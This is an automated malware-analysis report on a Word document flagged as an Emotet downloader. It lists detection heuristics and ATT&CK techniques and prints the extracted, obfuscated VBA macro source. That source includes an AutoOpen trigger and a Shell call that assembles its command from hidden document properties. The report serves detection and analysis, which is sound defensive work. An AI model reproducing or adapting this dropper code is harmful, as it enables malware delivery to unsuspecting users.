Verdict: MALICIOUS
Risk Score: 210

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6344335-3', indicating a known downloader variant. Heuristics confirm the presence of VBA macros, specifically an AutoOpen macro that utilizes the Shell() function, which is a strong indicator of malicious intent. The reference to PowerShell suggests the macro is likely used to download and execute a secondary payload, a common tactic for Emotet.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-6344335-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  `On Error Resume Next VBA.Shell$ "" + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + ActiveDocument.CustomDocumentProperties("dLTfAuubRMz") + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + ActiveDocument.BuiltInDocumentProperties("Comments") + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + HRNbDGxU, 0 End Function`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  `Sub autoopen() vKDamGK`
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6590 bytes |

SHA-256: e647fdaaff009e956bc933453a13e6a8c16232ca567e96b584201b9cc4cb6076
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub WYA(ycbrFt61j)
On Error Resume Next
For GWmi6C7 = 150 To 8942
If IDsU0SVcf Eqv LFzv29 Then
umQq = 793
End If
While zUsmU80YL Eqv 336179701
Mjuv0 = 36305085 + Sin(spkRYaL) / xauCjva + aVXmU31u5
Wend
PFkm7X6 = Ris
Select Case iyXC397Jx
Case 523
gMmE8TJ7y = Sqr(anFU7)
gna = ivDz5mQ0
swsCxJ = jQOz
Case 34
alH = Tan(9 * CByte(MnLzS) - AImz6 + Round(165366814))
qSMm2D5x9 = gIp
DvJoP0 = CStr(58 - CLng(xFcs47) / kFoAl / Fix(cHDS))
Case 1
sKzp374y = CDbl(86)
XgiO = MZe
ZgcVl = qUof8
End Select
For Each ITMc In TSvSs0j5
qvJdp = (hYflU26 - 393173989 / 43 * CDbl(eieZ) + 7 / Chr(wZns3x5q + Hex(fqGqkM4R) - 875 - ChrB(xUivv)))
Next
For WjZCw8 = cMFv8e193 To 4168
PDZZ30b1 = (970 + Tan(497) + 7 / Oct(2) + 9 - hmbkodI + Aldb / Tan(uXs / Round(404 - CBool(499 - ChrB(753))) * 950 * PhzfHI5rH))
Next
Next
Select Case GFctB2D
Case 64
IrYg = Tan(46)
DoGUi58f = CSng(exPr2g + CLng(42))
SLsaU = CStr(TXCq37ee4)
Case 452269913
Pfdpt25t = dfGR94
mvZco = 3815
LVsqE18 = 170
Case 6093
CRn = XZJpX
qZraT9RF = Chr(8 * Int(BrkL3O93R))
kcWl92n4 = ChrW(351 * IxZi)
End Select
End Sub
Sub EwEB8(LVhI5QiW)
On Error Resume Next
ZQO = 163195590 * aSNN94f94
RhLj2 = 523434313 / CLng(nyF * CSng(spiJ77)) + 9 / Rnd(90) - (WAv / oLsB73 - icsd5P * Sin(12 - jWsXj0 + jolN78n97 * Tan(7768)))
End Sub
Sub autoopen()
vKDamGK
End Sub
Sub Rlpz(TyRZ4)
On Error Resume Next
Do While nkcg10 = PQYLqo
WkNS4 = (bDCmN0 - Rnd(qyOjJ) * lMjcXCp * CLng(50)) + (506 + Fix(gngw4ur - CDbl(hCpY8Zl22) * 943 * CStr(myD)) * WqSc2E33r * CByte(5))
Do While dnRd9 <> ONkO
glSDC = 982 + Sqr(708 + Tan(6015) * xLlk6s / CSng(82)) * 7404 / CByte(2856 + CStr(cNYA58N)) * cJMR / ChrW(5221) + MRgUf12 / Wul + EyAj14653 - Tayy7x5 + Eazlp - Cos(213) + 87 * ChrB(148531398 / Fix(mHBNg83) + 191 - Oct(OqFx90))
Loop
Do
gNtu31Ws1 = Chr(21)
Loop Until WAqp8M <= gUhae5a61
Set Oct = 97
Loop
Select Case FToZ3Q
Case 3
EVFA = Rnd(HUcu33o3 - Hex(176937495))
GyIv3 = zpWx39p
Case 9
BAj = Sin(1065)
ibal4d = Int(YPnLHgJ - 23)
End Select
End Sub
Sub mHly92()
On Error Resume Next
Do
Select Case OvmXe2940
Case 319
AMNZW2 = mpE
jVAJ = Int(UgZs)
Case 7379
qTzh = 1265
KIOeoQ97 = uPrq4DIo
End Select
If Sfyu Or 7 Then
rwybHKx9 = 1
End If
Select Case UXTw67f
Case 329477815
OaxZ88 = Sqr(omNRm3g)
nfrN = Chr(500429753 + ChrW(DQjO))
KSpPa4 = GLAkPIZh
Case 55
AeWOPe34 = 524604147
MAa = ChrB(WSulMC48)
iALG = 9024
Case 984
Hen = Sqr(3)
Hpns = YEtMum
aOy = Sgn(hjPQOI)
End Select
If Ezvr1 < EqnZGX Then
RkcK2Q = Fix(476 + Fix(3372) + 384 / CDate(Snr))
End If
For Each JTwzu7h8T In bquD9acX6
irJc88jE = (470 / Cos(1582) - 1 - ChrW(NlaARB82) - pyobi * Fix(NVA) / (SKNW3 / Sgn(416368643) / YACdn6pH * 5))
Next
Loop Until CACYp3302 = Hsv
For Each cQvd In xeMy3Eg0
Do While smCz Eqv baP
JDBc43G33 = 394855255 + hJjBx * 7 - Chr(327)
Loop
Do
XrpgAuR5 = sUpI9063 / Sin(52 * CStr(2158 / CByte(905)) * vNXO + Sgn(5123 - 8)) + (862 * qXiL + XbkQ71 - CLng(156 * Fix(311872670 / EjMQ - 9900 / oPex65)) / 466235086 + Cos(7091 / Chr(EKt) * 9 / CDbl(173)))
Loop Until JLJB7 <> vBJt1cyr2
Do While vTpEW50q Or BHV
NFwA5 = kmJ - CLng(182027059) + TWXk0 * 48 - (1172 + 6861 - 8313 * Atn(dQdD4c768))
Loop
Next
dQKi = rGzY + 215849758
End Sub
Public Function vKDamGK()
On Error Resume Next
VBA.Shell$ "" + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + ActiveDocument.CustomDocumentProperties("dLTfAuubRMz") + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + ActiveDocument.BuiltInDocumentProperties("Comments") + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + HRNbDGxU, 0
End Function
Sub MyFA(LWRTzy4)
On Error Resume Next
Do
YVKo7G546 = Round(5861)
Do
TgPcYS293 = 2268 - Chr(1 / mqBN68xfL * AeBmB65 / CBool(69 - Sqr(333111979 + aBwQ28 * mUjkg086V + Sin(owcssNi0)) - LNCI58j3 * Chr(504492035 * Hex(257 * Int(28 / Log(2 * QtXp) + 1 * CByte(446152698))) * 6801 - CDate(826)))) * 91 * Rnd(tiakY2 * CStr(JmnH)) + (Nhhd7 * 84 * (9 / 49))
Loop Until zgYT7bK = mvMjM
Select Case SccUGi036
Case 167
phob3o3O = 2
epI = doKW7Y01
Case 318244424
dSEI6T8G = CInt(NwFP)
rnAL629p = Tan(104656488)
Case 3139
zyhN = Fix(UxBfqZo)
sIjr4 = 58
End Select
HXJj = zSwTY
Loop Until GwaXy53L0 Or cbHV03FD
If RZwXk784e And 19 Then
For MLm = 93 To mAMx1B62
LKRB = 4959 - 2120 * 80 / Round(4948) - (487 + Hex(PJXZ0H) - alJ * CByte(69 * 92) - (TNlw0 + KhR))
Next
OzsVF = 166466868 - 410642679
End If
PBrr99V = (5946 * Rnd(nBF + 372 / NSMp - Tan(ZuKQ24 - 83)) + 504637565 + Atn(210)) / NVs / Log(oMs) - nPQo6nNB7 / CBool(rHzxE) - lPuB2x8 * Fix(jqJU290 - Atn(450609395))
End Sub
Sub VfM(KoWfNcC)
On Error Resume Next
rAdT59 = FxCL + CStr(440 * LiMJc7f1) * 14 - Round(bXUjCB61)
Select Case bvYi4
Case 5
xoma41J = ChrB(RtJjqlPN - Sin(hvCjd7y * 824 - WnnW45p - CStr(5416)))
WRs = CInt(444 - Oct(LkBXfLlBi * CDbl(9569)) - 8 * CBool(2804 - Sqr(113)))
Case 58
HBLGjz = CLng(298)
fDyEYx = CLng(343497477)
Case 514923700
BPeK73H = 3
RyECD8 = 66
End Select
End Sub
```